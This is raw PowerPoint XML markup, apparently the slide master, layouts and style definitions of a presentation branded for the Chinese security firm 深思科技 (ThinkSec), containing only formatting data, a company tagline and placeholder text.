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54" r:id="rId2"/>
    <p:sldId id="279" r:id="rId3"/>
    <p:sldId id="523" r:id="rId4"/>
    <p:sldId id="562" r:id="rId5"/>
    <p:sldId id="578" r:id="rId6"/>
    <p:sldId id="579" r:id="rId7"/>
    <p:sldId id="582" r:id="rId8"/>
    <p:sldId id="581" r:id="rId9"/>
    <p:sldId id="580" r:id="rId10"/>
    <p:sldId id="563" r:id="rId11"/>
    <p:sldId id="585" r:id="rId12"/>
    <p:sldId id="584" r:id="rId13"/>
    <p:sldId id="583" r:id="rId14"/>
    <p:sldId id="586" r:id="rId15"/>
    <p:sldId id="592" r:id="rId16"/>
    <p:sldId id="566" r:id="rId17"/>
    <p:sldId id="591" r:id="rId18"/>
    <p:sldId id="589" r:id="rId19"/>
    <p:sldId id="593" r:id="rId20"/>
    <p:sldId id="588" r:id="rId21"/>
    <p:sldId id="587" r:id="rId22"/>
    <p:sldId id="595" r:id="rId23"/>
    <p:sldId id="600" r:id="rId24"/>
    <p:sldId id="599" r:id="rId25"/>
    <p:sldId id="597" r:id="rId26"/>
    <p:sldId id="598" r:id="rId27"/>
    <p:sldId id="601" r:id="rId28"/>
    <p:sldId id="596" r:id="rId29"/>
    <p:sldId id="576" r:id="rId30"/>
    <p:sldId id="603" r:id="rId31"/>
    <p:sldId id="613" r:id="rId32"/>
    <p:sldId id="612" r:id="rId33"/>
    <p:sldId id="611" r:id="rId34"/>
    <p:sldId id="610" r:id="rId35"/>
    <p:sldId id="614" r:id="rId36"/>
    <p:sldId id="470"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572">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="99">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="845">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="4065">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" pos="2880">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="884">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="5420">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="291">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="10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AC"/>
    <a:srgbClr val="984807"/>
    <a:srgbClr val="DAC000"/>
    <a:srgbClr val="FFDE00"/>
    <a:srgbClr val="E91A28"/>
    <a:srgbClr val="003296"/>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9553" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="91" d="100"/>
          <a:sy n="91" d="100"/>
        </p:scale>
        <p:origin x="-864" y="-96"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide orient="horz" pos="572"/>
        <p:guide orient="horz" pos="99"/>
        <p:guide orient="horz" pos="845"/>
        <p:guide orient="horz" pos="4065"/>
        <p:guide pos="2880"/>
        <p:guide pos="884"/>
        <p:guide pos="5420"/>
        <p:guide pos="291"/>
        <p:guide pos="10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F41837B-D952-431B-BF83-08A2A0A06E38}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2016/2/3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26FA386-B8A7-4E8C-909A-E051802F56B3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1135795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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92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1CE6A4-1159-478B-9E82-5A14A296193D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>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标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="692150"/>
            <a:ext cx="1295400" cy="525463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3200" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>深思科技</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="C:\Users\YaoZhang\Desktop\ThinkSec.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="1052513"/>
            <a:ext cx="1081087" cy="384175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183313" y="6308725"/>
            <a:ext cx="2663825" cy="382588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="4800" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>未知威胁领域先行者</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683569" y="1772816"/>
            <a:ext cx="7699623" cy="1109985"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>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38777" y="3284984"/>
            <a:ext cx="6328023" cy="548481"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">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A">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="C:\Users\YaoZhang\Desktop\ThinkSec.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7519988" y="109538"/>
            <a:ext cx="1081087" cy="384175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7480300" y="415925"/>
            <a:ext cx="1671638" cy="292100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>未知威胁领域先行者</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8548688" y="131763"/>
            <a:ext cx="595312" cy="339725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>深思</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直接连接符 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7651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6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="468313" cy="765175"/>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67544" y="41379"/>
            <a:ext cx="6696744" cy="719137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C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4744"/>
            <a:ext cx="8229600" cy="5328592"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" marR="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4F81BD"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="0039AC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" marR="0" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4F81BD"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" marR="0" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4F81BD"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" marR="0" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4F81BD"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" marR="0" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4F81BD"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="C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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6737350" y="6483350"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>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B">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468312" y="202630"/>
            <a:ext cx="8218487" cy="778445"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="32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2776"/>
            <a:ext cx="8229600" cy="5040560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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7DE1931B-4D8E-4334-8BFC-3AEE8894075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01" y="188913"/>
            <a:ext cx="8229600" cy="719137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8AC3C2CA-A3EE-4F6B-BF0F-5F8D3504AC5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A2018A3F-B113-4511-B5B9-4DDFB3471A1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188913"/>
            <a:ext cx="8229600"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341438"/>
            <a:ext cx="82296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44842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7BE29D7-B473-4A20-A9DF-58E85BC922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3" r:id="rId3"/>
    <p:sldLayoutId id="2147483652" r:id="rId4"/>
    <p:sldLayoutId id="2147483651" r:id="rId5"/>
  </p:sldLayoutIdLst>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ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buFont typeface="Arial" charset="0"/>
        <a:defRPr sz="3200" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buFont typeface="Arial" charset="0"/>
        <a:defRPr sz="2800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
